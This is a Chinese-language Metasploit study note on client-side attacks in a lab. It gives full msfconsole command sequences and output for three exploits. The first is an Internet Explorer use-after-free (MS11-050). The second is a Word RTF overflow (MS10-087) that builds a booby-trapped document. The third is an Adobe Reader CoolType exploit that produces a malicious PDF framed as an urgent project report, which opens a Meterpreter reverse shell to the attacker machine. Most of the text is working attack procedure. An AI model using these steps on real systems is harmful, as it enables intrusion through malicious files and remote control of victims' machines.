Metasploit学习笔记——客户端渗透攻击
1.浏览器渗透攻击实例——MS11-050安全漏洞
示例代码如下
msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > info
Name: MS11-050 IE mshtml!CObjectElement Use After Free
Module: exploit/windows/browser/ms11_050_mshtml_cobjectelement
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2011-06-16
Provided by:
d0c_s4vage
sinn3r <sinn3r@metasploit.com>
bannedit <bannedit@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
1 Internet Explorer 7 on XP SP3
2 Internet Explorer 7 on Windows Vista
3 Internet Explorer 8 on XP SP3
4 Internet Explorer 8 on Windows 7
5 Debug Target (Crash)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 500
Avoid: 6 characters
Description:
This module exploits a use-after-free vulnerability in Internet
Explorer. The vulnerability occurs when an invalid <object> tag
exists and other elements overlap/cover where the object tag should
be when rendered (due to their styles/positioning). The
mshtml!CObjectElement is then freed from memory because it is
invalid. However, the mshtml!CDisplay object for the page continues
to keep a reference to the freed <object> and attempts to call a
function on it, leading to the use-after-free. Please note that for
IE 8 targets, JRE (Java Runtime Environment) is required to bypass
DEP (Data Execution Prevention).
References:
https://cvedetails.com/cve/CVE-2011-1260/
OSVDB (72950)
https://technet.microsoft.com/en-us/library/security/MS11-050
http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html
msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > set URIPATH ms11050
URIPATH => ms11050
msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > set LPORT 8443
LPORT => 8443
msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > exploit
[*] Exploit running as background job 0.
[*] Started HTTP reverse handler on http://10.10.10.128:8443
msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > [*] Using URL: http://0.0.0.0:8080/ms11050
[*] Local IP: http://10.10.10.128:8080/ms11050
[*] Server started.
在靶机中启动IE浏览器访问该链接
[-] 10.10.10.254 ms11_050_mshtml_cobjectelement - Unknown User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
由于靶机的IE版本不在可以利用的范围内,就只能大概测试一下,如果成功的话
2.针对Office软件的渗透攻击实例——MS10-087安全漏洞
示例代码如下
msf > search ms10_087
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set payload windows/exec
payload => windows/exec
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set CMD calc.exe
CMD => calc.exe
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
FILENAME => ms10087.rtf
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit
[*] Creating 'ms10087.rtf' file ...
[+] ms10087.rtf stored at /root/.msf4/local/ms10087.rtf
将这个文件复制到WinXP靶机,双击运行,其中存在的安全漏洞被利用,从而执行Metasploit的攻击载荷,弹出计算器程序。
3.Adobe阅读器渗透攻击实战案例——加急的项目进展报告
示例代码如下
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(windows/fileformat/adobe_cooltype_sing) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(windows/fileformat/adobe_cooltype_sing) > set LPORT 8443
LPORT => 8443
msf exploit(windows/fileformat/adobe_cooltype_sing) > set FILENAME 2.pdf
FILENAME => 2.pdf
msf exploit(windows/fileformat/adobe_cooltype_sing) > exploit
[*] Creating '2.pdf' file...
[+] 2.pdf stored at /root/.msf4/local/2.pdf
在攻击机再启动一个对应于载荷的监听端,等待靶机回连,示例代码如下
msf exploit(windows/fileformat/adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(multi/handler) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(multi/handler) > set LPORT 8443
LPORT => 8443
msf exploit(multi/handler) > exploit
[*] Started HTTP reverse handler on http://10.10.10.128:8443
将该模块产生的测试文件2.pdf复制到WinXP靶机中,双击打开该文件,监听端接到来自靶机的Meterpreter连接,执行命令对靶机环境进行基本查询,示例代码如下
[*] http://10.10.10.128:8443 handling request from 10.10.10.254; (UUID: q3cpml8e) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (10.10.10.128:8443 -> 10.10.10.254:1089) at 2020-02-04 20:42:21 +0800
meterpreter > sysinfo
Computer : DH-CA8822AB9589
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
相应地查看WinXP靶机中的情形,可以看到阅读软件Adobe Reader被溢出之后已经处于崩溃状态,不能够正常显示了